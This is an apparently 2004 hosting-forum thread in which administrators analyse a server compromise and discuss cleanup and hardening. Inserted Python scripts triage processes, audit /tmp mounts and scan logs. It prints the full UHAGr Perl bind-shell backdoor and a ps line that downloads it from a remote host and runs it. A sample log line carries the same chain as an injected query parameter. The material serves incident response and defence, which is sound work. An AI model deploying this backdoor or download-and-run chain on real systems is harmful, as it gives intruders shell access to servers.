
hacked ???? www.uhagr.org

Discussion in 'General Discussion' started by bidouilleur, Apr 18, 2004.

  1. bidouilleur (Well-Known Member, joined Apr 27, 2003):
    While looking over something on a server I came across this line:


    nobody 32749 0.0 0.0 2100 972 ? S Apr17 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001


    I went to that URL and found:

    #!/usr/bin/perl

    ##############################################
    # Simple backdoor by UHAGr coded by ghostian #
    # usage: ./UHAGr-bd.pl <port> (default 75000)#
    # On shell ls = ls; etc. #
    # www.uhagr.org #
    ##############################################

    use IO::Socket;

    $msg   = "echo ::[UHAGr] Yeah! ::-";   # banner echoed to whoever connects
    $port  = ($ARGV[0]);                    # listening port from the command line (2001 in the ps line above)
    $shell = "/bin/sh";

    if (!$port) { $port = "75000"; }        # note: 75000 lies outside the valid 0-65535 TCP port range

    # Bind a listening TCP socket on the chosen port (backlog of 1).
    $local = IO::Socket::INET->new(Proto => "tcp", LocalPort => "$port",
                                   Listen => "1") or die "Port already in use \n";

    print "
    ##############################################
    # Simple backdoor by UHAGr coded by ghostian #
    # usage: ./UHAGr-bd.pl <port> (default 75000)#
    # On shell ls = ls; etc. #
    # www.uhagr.org #
    ##############################################
    ";

    # For every inbound connection: wire the client socket to the shell's
    # stdin/stdout, so whoever connects gets /bin/sh running as the owner of
    # this process (here the web server's "nobody" user).
    while (accept(remote, $local)) {
        open(STDIN,  ">&remote");
        open(STDOUT, ">&remote");
        open(STDERR, ">kick");     # stderr goes to a scratch file in the cwd (/tmp)

        system($msg);
        system($shell);            # blocks until the client exits the shell

        close(STDERR);
        close(STDIN);
        close(STDOUT);
        system("rm kick");         # remove the scratch file before the next connection
    }


    At http://www.uhagr.org/ I found some tools to exploit servers, etc.

    I do think we have some kind of backdoor open on this server. I'm no expert at all, so that is the reason I come and ask here what it does, what a sysadmin could do to close this, and where to find the file or how to find it.
    My feeling is that it is used to open a relay for spam (personal opinion),
    or am I completely wrong?

    thanks a lot for your help in this matter
     
  2. noc32 (Member, joined Feb 28, 2004):
    This will get that Perl script and will launch it. That will provide the hacker with a shell on port 2001, as it seems from the command launched.
     
  3. laura (Active Member, joined Sep 12, 2003, Indonesia):
    Hi noc32,
    how do you clean your server after that?
     
  4. noc32 (Member, joined Feb 28, 2004):
    How do you clean the server? Good question indeed, because what was presented here is just a backdoor to the system and god knows what that hacker brought to the system. The system will have to be scanned for:
    - rootkits
    - other backdoors
    - modified binaries (like ps, ls, ...)

    If you're not used to this it's advised to hire a professional to do this, or you could always make a full backup and do an OS restore.
     
  5. bidouilleur (Well-Known Member, joined Apr 27, 2003):
    We ran a rootkit checker and it showed nothing really special.

    We have a firewall and, except for the standard ports needed to run normal services, all is closed. We monitor the iptables log and nope, no trace of any traffic nor intrusion (or break-out try).

    I killed the services that led me to this and they didn't restart, even after a reboot.

    That is the reason we find it hard to trace. We keep a close watch on the server; hope we can trace it one day.

    No unusual traffic.
     
  6. eth00 (Well-Known Member, PartnerNOC, joined Mar 30, 2003, NC, cPanel Access Level: Root Administrator):
    I played around with that for a while and it seems like, the way it was started and all, it was just a temporary shell. Now, though he might have been able to hack your server, it looks like you stayed safe. Once loaded he would have tried to access it, but your firewall blocked port 2001, which is what saved you, I think.

    Still keep a close eye on it, but it looks like you should be fine.
     
  7. damainman (Well-Known Member, joined Nov 13, 2003):
    Where did you find that line?

    Is there any way to report that user to Yahoo?
     
    (#7 damainman, posted Apr 22, 2004; last edited Apr 22, 2004)
  8. eth00 (Well-Known Member, PartnerNOC, joined Mar 30, 2003, NC, cPanel Access Level: Root Administrator):
    The line was in ps -aux, or at least it could be seen there. All ISPs have an abuse department; just look on their main website or do a whois on the domain.
     
  9. bidouilleur (Well-Known Member, joined Apr 27, 2003):
    I have a little file on a small account that I can call via the browser with

    #!/usr/bin/perl
    # Prints basic host information as an HTML page. Everything below (who is
    # logged in, the full process list) is visible to anyone who can reach this
    # URL, so it belongs behind authentication or an IP restriction.

    print "Content-type: text/html\n\n";
    print "<html><h1>System Report</h1></html>\n";
    print "<br>\n<br>\n<br>\n";
    print "System UPTIME response : ";
    print `uptime`;
    print "\n<br>System UNAME response : ";
    print `uname -a`;
    print "\n<br>System WHO response : ";
    print `who`;
    print "\n<br>System ps -auwx response : <pre>\n";
    print `ps -auwx`;      # wide output, so long command lines like the wget chain are not cut off
    print "\n</pre>";

    It gives you general info on the server and you see a lot in there.

    This is how I saw these lines:

    nobody 4442 0.0 0.0 5052 476 ? S 19:24 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001
    nobody 4444 0.0 0.1 6824 1324 ? S 19:24 0:00 perl bd.txt 2001


    And it came back. Trying to dig again, I found 3 bd.txt in /tmp this time. I didn't kill anything yet since the ports are closed, but I am trying to find out now where they come from; there must be something creating these files. In the file you see the script from post one, which you can also see on the site.

    Wondering if there is something else I should delete or not.
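Added example (editor's code, not part of the thread and not the UHAGr script): a small Python triage script that does what noc32 and eth00 did by hand on the ps lines quoted in posts 1 and 9. It reads a `ps auxw` snapshot, flags any process whose command line downloads a file and hands it straight to an interpreter, ties the bare `perl bd.txt 2001` child back to the `sh -c` chain that fetched the file, and pulls out the URL and the trailing numeric argument (2001 here, the port the rest of the thread reasoned from; the UHAGr usage line says that argument is its listening port). The ps snapshot is constructed for this example, and the lists of downloaders and interpreters are assumptions; a flagged port should still be confirmed with `netstat -tlnp` before acting on it.

```python
import os
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed `ps auxw` snapshot (assumed sample, not the thread's server): the
# two lines bidouilleur quoted plus some benign processes for contrast.
SAMPLE_PS = """\
USER       PID %CPU %MEM   VSZ  RSS TTY STAT START TIME COMMAND
root         1  0.0  0.0  1500  500 ?   S    Apr17 0:04 init [3]
nobody    4442  0.0  0.0  5052  476 ?   S    19:24 0:00 sh -c cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001
nobody    4444  0.0  0.1  6824 1324 ?   S    19:24 0:00 perl bd.txt 2001
nobody    4450  0.0  0.3 12000 4000 ?   S    19:20 0:00 /usr/local/apache/bin/httpd
mysql     1200  0.0  1.0 30000 9000 ?   S    Apr17 0:10 /usr/sbin/mysqld
"""

FETCHERS = {"wget", "curl", "lynx"}                 # assumed list of downloaders
INTERPRETERS = {"perl", "python", "php", "sh", "bash"}  # assumed list of interpreters
TMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


@dataclass
class Finding:
    pid: int
    user: str
    reason: str
    url: Optional[str] = None
    script: Optional[str] = None
    listen_port: Optional[int] = None   # last numeric argument; the UHAGr script takes its port there


def parse_ps(text: str) -> List[Dict]:
    """Split `ps aux` lines into user, pid and the full COMMAND field (11th column onward)."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 10)
        if len(parts) < 11 or not parts[1].isdigit():
            continue   # header or truncated line
        rows.append({"user": parts[0], "pid": int(parts[1]), "cmd": parts[10]})
    return rows


def argv_of(text: str) -> List[str]:
    try:
        return shlex.split(text)
    except ValueError:            # unbalanced quotes: fall back to whitespace split
        return text.split()


def split_stages(script: str) -> List[List[str]]:
    """Break a shell one-liner on ; && || | into the argv of each stage."""
    stages = []
    for piece in re.split(r"\s*(?:;|&&|\|\||\|)\s*", script):
        argv = argv_of(piece)
        if argv:
            stages.append(argv)
    return stages


def analyse_command(cmd: str) -> dict:
    """Pick the cd / fetch / interpret pieces out of one COMMAND field.

    `sh -c '...'` shows up in ps with its argument already flattened, so the
    chain is rebuilt by joining everything after -c and splitting on separators.
    """
    argv = argv_of(cmd)
    if len(argv) >= 3 and os.path.basename(argv[0]) in {"sh", "bash"} and argv[1] == "-c":
        stages = split_stages(" ".join(argv[2:]))
    else:
        stages = [argv] if argv else []
    info = {"cd": None, "url": None, "interpreter": None, "script": None, "port": None}
    for stage in stages:
        prog = os.path.basename(stage[0])
        if prog == "cd" and len(stage) > 1:
            info["cd"] = stage[1]
        elif prog in FETCHERS:
            urls = [a for a in stage[1:] if re.match(r"(?:https?|ftp)://", a)]
            if urls:
                info["url"] = urls[0]
        elif prog in INTERPRETERS:
            args = [a for a in stage[1:] if not a.startswith("-")]
            if args:
                info["interpreter"], info["script"] = prog, args[0]
                digits = [a for a in args[1:] if a.isdigit()]
                if digits:
                    info["port"] = int(digits[-1])
    return info


def triage(ps_text: str) -> List[Finding]:
    rows = [(row, analyse_command(row["cmd"])) for row in parse_ps(ps_text)]
    findings, fetched = [], set()
    # Pass 1: one command that downloads something and hands it to an interpreter.
    for row, info in rows:
        if info["url"] and info["interpreter"]:
            findings.append(Finding(row["pid"], row["user"],
                                    "downloads a file and runs it through %s in one shell command" % info["interpreter"],
                                    info["url"], info["script"], info["port"]))
            fetched.add(os.path.basename(info["script"]))
    # Pass 2: the interpreter child only shows `perl bd.txt 2001`; tie it to pass 1 by
    # script name, and also catch interpreters fed a file that lives in a temp directory.
    for row, info in rows:
        if info["url"] or not info["script"]:
            continue
        if os.path.basename(info["script"]) in fetched or info["script"].startswith(TMP_DIRS):
            findings.append(Finding(row["pid"], row["user"],
                                    "%s running a script that was fetched into or lives in a temp directory" % info["interpreter"],
                                    None, info["script"], info["port"]))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_PS):
        print(f)
```

On a live box, feed it `ps auxww` output so the COMMAND column is not truncated; both findings come back with pid, user, URL and port, which is enough to block the port, kill the processes and go looking for what spawned them.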
     
  10. noc32 (Member, joined Feb 28, 2004):
  11. woolly (Active Member, joined Dec 29, 2003):
    You should really secure your tmp directory.

    Put /tmp and /var/tmp into a separate partition and then make it non-executable.
     
  12. r00t316 (Active Member, joined Nov 29, 2003):
    Just because /tmp or /var/tmp is not executable doesn't mean you cannot execute Perl scripts or the like:

    perl /tmp/bleh.pl

    will still work.
    Why?
    Because perl is actually doing the executing and it is only parsing /tmp/bleh.pl.

    At any rate.
    You need to install phpsuexec and suexec.

    Someone did PHP injection on one of your customers' sites.
    Now, because you do not have phpsuexec installed, you cannot tell who actually has the vulnerable software.
    And you now probably have someone logging into your server as nobody, which is really bad.
    If you run phpsuexec, then if they do get a backdoor they are only going to be the user of that site.
    Then you can look at the files in /tmp and see the user.
    Look for his domain and then check /usr/local/apache/domlogs.
    Then look through their domain log file and you can see what was actually called and how they did it.
    I also recommend running iptables.
    Block everything inbound and only allow certain ports:
    80, 21, 22, 53, 443, 2086, etc.
    Then that backdoor won't work, because you did not specify in the iptables rules that port 2001 is allowed inbound traffic.

    You should really mount /tmp as a separate partition, however.
    It turns away some people by not letting them execute from it.
    Most people use Perl now for backdoors because everyone has Perl installed.

    Also you should check /dev/shm <-- new tmp for glibc2.
    You can umount that; it isn't needed.
    umount /dev/shm, and you probably want to add that to a startup file so it unmounts it at every boot.

    Before you do that, ls -la /dev/shm
    and make sure no one has already put files in it to hack you.

    Once you get /tmp mounted as a separate partition:
    stop mysql
    rm -rf /var/tmp
    ln -s /tmp /var/tmp
    Then you actually stop /var/tmp from being executable too.

    Hope this helps :P
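Added example (editor's code, not from woolly or r00t316) that makes the two sides of the /tmp discussion concrete. `audit_fstab` reads an /etc/fstab and reports, for /tmp, /var/tmp and /dev/shm, whether each is a separate mount and which of nodev, nosuid and noexec it is missing; `noexec_stops` is a heuristic that models r00t316's point, namely that noexec only refuses to execve() a file living on the mount, so `./bd` after `cd /tmp` is blocked while `perl bd.txt` is not. The two fstab excerpts are constructed: the weak one has everything on the root filesystem, the hardened one follows r00t316's steps (/tmp on its own partition, /var/tmp symlinked to /tmp so it has no fstab line) and, as this example's own choice rather than the thread's, mounts /dev/shm with the same options instead of unmounting it.

```python
import os
import re
from typing import Dict, List, Optional

# Constructed /etc/fstab excerpts (assumed samples, not from any real server).
# WEAK_FSTAB is the layout the thread is warning about: /tmp and /var/tmp are
# plain directories on the root filesystem and /dev/shm is mounted with
# defaults, so all three are writable and executable by "nobody".
WEAK_FSTAB = """\
LABEL=/    /         ext3   defaults   1 1
none       /dev/shm  tmpfs  defaults   0 0
"""
# HARDENED_FSTAB: /tmp on its own partition with nodev,nosuid,noexec and
# /var/tmp replaced by a symlink to /tmp (so no fstab line of its own).
# /dev/shm gets the same options here instead of being unmounted; that is
# this example's choice, not the thread's.
HARDENED_FSTAB = """\
LABEL=/    /         ext3   defaults                      1 1
/dev/hda7  /tmp      ext3   defaults,nodev,nosuid,noexec  1 2
none       /dev/shm  tmpfs  defaults,nodev,nosuid,noexec  0 0
"""

WATCH = ("/tmp", "/var/tmp", "/dev/shm")
REQUIRED = {"nodev", "nosuid", "noexec"}


def parse_fstab(text: str) -> Dict[str, set]:
    """Map each mount point to its option set, ignoring comments and blank lines."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 4:
            mounts[fields[1]] = set(fields[3].split(","))
    return mounts


def audit_fstab(text: str, symlinks: Optional[Dict[str, str]] = None) -> Dict[str, Optional[List[str]]]:
    """For each watched directory: the list of missing hardening options,
    [] when fully hardened, or None when it is not a separate mount at all
    (and therefore inherits the executable root filesystem)."""
    mounts = parse_fstab(text)
    symlinks = symlinks or {}            # e.g. {"/var/tmp": "/tmp"} after `ln -s /tmp /var/tmp`
    report = {}
    for mp in WATCH:
        opts = mounts.get(symlinks.get(mp, mp))
        report[mp] = None if opts is None else sorted(REQUIRED - opts)
    return report


def noexec_stops(command: str, noexec_mounts, cwd: str = "/") -> bool:
    """Heuristic: would a noexec mount have refused this shell chain?

    noexec only blocks execve() of a file on the mount. `./bd` after `cd /tmp`
    is refused; `perl bd.txt` is not, because the kernel executes /usr/bin/perl
    (found via PATH, outside the mount) and perl merely reads the script.
    """
    for piece in re.split(r"\s*(?:;|&&|\|\||\|)\s*", command):
        argv = piece.split()
        if not argv:
            continue
        prog = argv[0]
        if prog == "cd":
            cwd = os.path.normpath(os.path.join(cwd, argv[1])) if len(argv) > 1 else "/"
            continue
        if "/" not in prog:
            continue            # resolved through PATH, so not on the temp mount
        path = os.path.normpath(os.path.join(cwd, prog))
        if any(path == m or path.startswith(m.rstrip("/") + "/") for m in noexec_mounts):
            return True
    return False


if __name__ == "__main__":
    print(audit_fstab(WEAK_FSTAB))
    print(audit_fstab(HARDENED_FSTAB, symlinks={"/var/tmp": "/tmp"}))
    chain = "cd /tmp ; wget http://geocities.yahoo.com.br/wzrdrox/bd.txt ; perl bd.txt 2001"
    print(noexec_stops(chain, ["/tmp"]))   # the thread's chain survives noexec
```

The second print is the thread's own backdoor chain and comes back False: noexec alone does nothing against it, which is why r00t316's other two measures (phpsuexec so the process is not `nobody`, and an inbound iptables policy that never allows port 2001) carry the real weight.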
     
  13. bmcpanel (Well-Known Member, joined Jun 1, 2002):
    You are right. Securing /tmp is not fool-proof, but it will deter some would-be hackers that would otherwise hack your box.
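Added example (editor's code, not from anyone in the thread) for the step r00t316 describes in post 12 but nobody shows: going through the per-domain Apache logs under /usr/local/apache/domlogs to see "what was actually called and how they did it". The function parses combined-format lines and flags requests whose query string carries a remote URL as a parameter value (the remote-include shape of the PHP injection r00t316 suspects), a shell command chain, or a reference to a temp directory, and returns the decoded query so the injected command can be read directly. The log lines are constructed for the example; the second one models a request whose `cmd` parameter carries the same chain that appeared in ps, and the parameter names and the 203.0.113.0/24 and 198.51.100.0/24 addresses are assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed Apache combined-format lines (assumed sample, not a real domlog).
# cPanel writes one such file per domain under /usr/local/apache/domlogs.
# The second line models a PHP remote-include request whose `cmd` parameter
# carries the shell chain that showed up in ps.
SAMPLE_DOMLOG = """\
203.0.113.9 - - [17/Apr/2004:19:23:58 +0200] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.9 - - [17/Apr/2004:19:24:01 +0200] "GET /index.php?page=http://203.0.113.77/c.txt&cmd=cd%20/tmp%20;%20wget%20http://geocities.yahoo.com.br/wzrdrox/bd.txt%20;%20perl%20bd.txt%202001 HTTP/1.1" 200 312 "-" "Wget/1.8"
198.51.100.4 - - [17/Apr/2004:19:30:12 +0200] "GET /images/logo.gif HTTP/1.1" 200 2048 "http://example.invalid/" "Mozilla/5.0"
"""

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: \S+)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def suspicious_requests(log_text: str) -> List[Dict]:
    """Return the requests whose query string looks like an injection attempt,
    with the query URL-decoded so the injected command is readable."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group("path"):
            continue
        script, query = m.group("path").split("?", 1)
        query = unquote(query)
        reasons = []
        if re.search(r"=(?:https?|ftp)://", query):
            reasons.append("parameter value is a remote URL (remote include)")
        if re.search(r"(?:^|[&=;|\s])(?:wget|curl|perl|sh)\b", query) and re.search(r"[;|`]", query):
            reasons.append("shell command chain in query string")
        if re.search(r"/(?:var/)?tmp\b", query):
            reasons.append("references a temp directory")
        if reasons:
            hits.append({"ip": m.group("ip"), "time": m.group("time"), "status": m.group("status"),
                         "path": script, "query": query, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_DOMLOG):
        print(hit["time"], hit["ip"], hit["path"], hit["reasons"])
        print("  decoded query:", hit["query"])
```

Run it over every file in the domlogs directory; the file that produces hits names the customer whose site has the hole, the `path` field names the script that was abused, and the `ip` and `time` fields go into the abuse report eth00 mentions.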
     